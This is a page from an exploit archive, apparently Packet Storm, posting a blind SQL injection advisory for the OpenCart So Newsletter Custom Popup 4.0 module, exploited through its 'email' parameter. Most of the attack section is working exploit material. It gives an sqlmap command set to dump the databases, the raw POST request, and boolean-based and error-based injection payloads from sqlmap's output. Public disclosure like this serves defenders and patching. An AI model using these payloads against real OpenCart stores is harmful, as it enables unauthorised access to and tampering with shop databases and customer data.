exploit the possibilities
Home Files News &[SERVICES_TAB]About Contact Add New

OpenCart 3.x Newsletter Custom Popup 4.0 SQL Injection

OpenCart 3.x Newsletter Custom Popup 4.0 SQL Injection
Posted Sep 19, 2022
Authored by Saud Alenazi

OpenCart 3.x Newsletter Custom Popup module version 4.0 suffers from a remote blind SQL injection vulnerability.

tags | exploit, remote, sql injection
SHA-256 | 4463bea9399b42e27cadceb696475f29a869f99cd0cfa6c5ded3a40898daf09c
Download | Favorite | View

OpenCart 3.x Newsletter Custom Popup 4.0 SQL Injection

Change Mirror Download
# Exploit Title: OpenCart v3.x So Newsletter Custom Popup Module - Blind SQL Injection
# Date: 18/09/2022
# Exploit Author: Saud Alenazi
# Vendor Homepage: https://www.opencart.com/
# Software Link: https://www.opencart.com/index.php?route=marketplace/extension/info&extension_id=40259&filter_search=newsletter&filter_license=1&sort=date_added
# Version: v.4.0
# Tested on: XAMPP, Linux
# Contact: https://twitter.com/dmaral3noz


* Description :

So Newsletter Custom Popup Module is compatible with any Opencart allows SQL Injection via parameter 'email' in index.php?route=extension/module/so_newletter_custom_popup/newsletter. 
Exploiting this issue could allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database.


* Steps to Reproduce :
- Go to : http://127.0.0.1/index.php?route=extension/module/so_newletter_custom_popup/newsletter
- Save request in BurpSuite
- Run saved request with : sqlmap -r sql.txt -p email --random-agent --level=5 --risk=3 --time-sec=5 --hex --dbs



Request :

===========

POST /index.php?route=extension/module/so_newletter_custom_popup/newsletter HTTP/1.1
Content-Type: application/x-www-form-urlencoded
Cookie: OCSESSID=aaf920777d0aacdee96eb7eb50
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate
Content-Length: 29
Host: 127.0.0.1
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:68.0) Gecko/20100101 Firefox/68.0
Connection: Keep-alive

createdate=2022-8-28%2019:4:6&email=hi&status=0


===========

Output :

Parameter: #1* ((custom) POST)
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: createdate=2022-8-28 19:4:6&email=hi' AND 4805=4805-- nSeP&status=0

    Type: error-based
    Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)
    Payload: createdate=2022-8-28 19:4:6&email=hi' AND (SELECT 4828 FROM(SELECT COUNT(*),CONCAT(0x7176627071,(SELECT (ELT(4828=4828,1))),0x7178786a71,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a)-- sRQS&status=0



Login or Register to add favorites

File Archive:

November 2024

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Nov 1st
    30 Files
  • 2
    Nov 2nd
    0 Files
  • 3
    Nov 3rd
    0 Files
  • 4
    Nov 4th
    12 Files
  • 5
    Nov 5th
    44 Files
  • 6
    Nov 6th
    18 Files
  • 7
    Nov 7th
    9 Files
  • 8
    Nov 8th
    8 Files
  • 9
    Nov 9th
    3 Files
  • 10
    Nov 10th
    0 Files
  • 11
    Nov 11th
    14 Files
  • 12
    Nov 12th
    20 Files
  • 13
    Nov 13th
    63 Files
  • 14
    Nov 14th
    18 Files
  • 15
    Nov 15th
    8 Files
  • 16
    Nov 16th
    0 Files
  • 17
    Nov 17th
    0 Files
  • 18
    Nov 18th
    18 Files
  • 19
    Nov 19th
    7 Files
  • 20
    Nov 20th
    13 Files
  • 21
    Nov 21st
    6 Files
  • 22
    Nov 22nd
    0 Files
  • 23
    Nov 23rd
    0 Files
  • 24
    Nov 24th
    0 Files
  • 25
    Nov 25th
    0 Files
  • 26
    Nov 26th
    0 Files
  • 27
    Nov 27th
    0 Files
  • 28
    Nov 28th
    0 Files
  • 29
    Nov 29th
    0 Files
  • 30
    Nov 30th
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2024 Packet Storm. All rights reserved.

Site Links
News by Month
News Tags
Files by Month
File Tags
File Directory
About Us
History & Purpose
Contact Information
Terms of Service
Privacy Statement
Copyright Information
Services
Security Services
Hosting By
Rokasec
close